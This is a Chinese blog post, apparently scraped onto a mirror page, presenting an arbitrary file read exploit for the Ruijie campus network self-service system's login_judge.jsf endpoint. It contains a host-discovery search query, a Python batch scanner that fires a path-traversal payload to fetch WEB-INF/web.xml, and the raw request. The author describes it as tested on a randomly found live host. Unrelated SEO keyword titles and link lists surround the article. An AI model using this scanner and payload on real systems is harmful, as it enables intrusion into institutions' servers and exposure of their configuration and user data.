当前位置: 首页 > news >正文

wamp做网站注册公司代理公司

wamp做网站,注册公司代理公司,服务提供网站,手机社区网站模板声明#xff1a;本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动#xff0c;将与本文档的作者或发布者无关。 一、漏洞描述 锐捷校园网自助服务系统是用于学校网络管理的一个平台#xff0c;login_judge.jsf接口存在任意文件读取… 声明本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动将与本文档的作者或发布者无关。 一、漏洞描述 锐捷校园网自助服务系统是用于学校网络管理的一个平台login_judge.jsf接口存在任意文件读取漏洞意味着攻击者可能通过特定的请求访问或下载系统上的任意文件这可能包括敏感的配置信息、用户数据等。 二、资产收集 1.使用网络空间测绘引擎搜索 鹰图检索web.body校园网自助服务系统 2.使用poc批量扫描 import requests import argparse import time from urllib3.exceptions import InsecureRequestWarning# 禁用不安全的请求警告 requests.packages.urllib3.disable_warnings(categoryInsecureRequestWarning)# 定义颜色代码用于输出红色文本 RED \033[91m RESET \033[0mdef check_vulnerability(url):检查目标URL是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞。:param url: 目标URLtry:# 构造攻击URL尝试访问WEB-INF目录下的web.xml文件attack_url url.rstrip(/) /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view%2e/WEB-INF/web.xml%3F# 发送GET请求不验证SSL证书设置超时时间为10秒response requests.get(attack_url, verifyFalse, timeout10)# 判断响应状态码和响应内容是否包含特定字符串if response.status_code 200 and web-app in response.text:print(f{RED}URL [{url}] 存在锐捷校园网自助服务系统login_judge任意文件读取漏洞{RESET})else:print(fURL [{url}] 不存在漏洞)except requests.exceptions.Timeout:# 捕获超时异常提示可能存在漏洞print(fURL [{url}] 请求超时可能存在漏洞)except requests.RequestException as e:# 捕获其他请求异常输出错误信息print(fURL [{url}] 请求失败 {e})def main():主函数解析命令行参数并执行漏洞检测。parser argparse.ArgumentParser(description检测目标地址是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞)parser.add_argument(-u, --url, help指定目标地址)parser.add_argument(-f, --file, help指定包含目标地址的文本文件)args parser.parse_args()if args.url:# 如果提供了单个URL参数确保其以http://或https://开头if not args.url.startswith(http://) and not args.url.startswith(https://):args.url http:// args.urlcheck_vulnerability(args.url)elif args.file:# 如果提供了文件参数逐行读取文件中的URL并进行检查with open(args.file, r) as file:urls file.read().splitlines()for url in urls:if not url.startswith(http://) and not url.startswith(https://):url http:// urlcheck_vulnerability(url)if __name__ __main__:main()cmd运行python poc.py -f url.txt 随机寻找的幸运儿 三、漏洞复现  1.构造数据包 GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F HTTP/1.1 Host:ip2.数据包分析  GET: 表示这是一个HTTP GET请求。/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F: 这是请求的URL路径。它包含了多个目录和文件名以及一个查询参数view。查询参数的值是./WEB-INF/web.xml%3F其中./WEB-INF/web.xml文件是Java Web应用程序的配置文件它包含了关于Web应用程序的配置信息%3F是问号?的URL编码这个查询参数是用来指定要访问的资源或执行某些操作。HTTP/1.1: 表示使用的是HTTP协议的版本1.1。Host: ip: 这是一个HTTP头字段表示请求的目标主机地址。这里的ip应该是实际的IP地址或者域名。 3.结束跑路 通过网页访问ip/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F 通过yakit构建数据包访问 寄语心向花开何不朝夕。
http://www.pierceye.com/news/513694/

相关文章:

  • 电商网站设计的原则免费下载app软件下载大全
  • 餐饮网站建设优化建站wordpress copyright
  • 腾讯建站官网设计网页步骤
  • 网站建设三方合同范本wordpress数字链接出现404
  • 下载用的网站怎么做网站模板怎么使用教程
  • 没有网站 可以做百度口碑吗展馆的科普网站建设
  • 河北网站备案查询系统商城网站seo
  • 网站申请页面网站空间不够用怎么办
  • 网站开发最合适的搭配螺栓球网架
  • 广东网站建设排名凡科建站下载
  • 建设厅网站预算员报名时间网站建设策划书的编制
  • 厦门手机网站建设公司哪家好鲜花网站源码
  • 北京家居网站建设如何制作软件手机软件
  • 北京网站建设策划解决方案长沙建设工程造价网站
  • 北京网站设计公司价格阿里云wordpress插件
  • 网站建设自助建站企业萧山人才网手机版
  • 长沙建站挺找有为太极wordpress 需要zend
  • 通信管理局 网站备案天猫网站设计教程
  • 营销型网站制作成都打造品牌的三点策略
  • 做查工资的网站如何下载网页在线视频
  • 北沙滩网站建设公司主页怎么填
  • 手机asp网站网站设计方案
  • 长春市网站开发广东一站式网站建设推荐
  • 企业网站推广策略商会联盟网站建设方案
  • 清丰网站建设百度推广建设网站是不是合发
  • 邢台12345网站哪个公司的装饰设计公司
  • 嘉兴网嘉兴网站建设手机网站管理软件
  • 网站主色调简介怎么说本地常州微信网站建设
  • 电子商务网站数据库建设怎样推广一个网站
  • illustrator 学习网站wordpress外链产品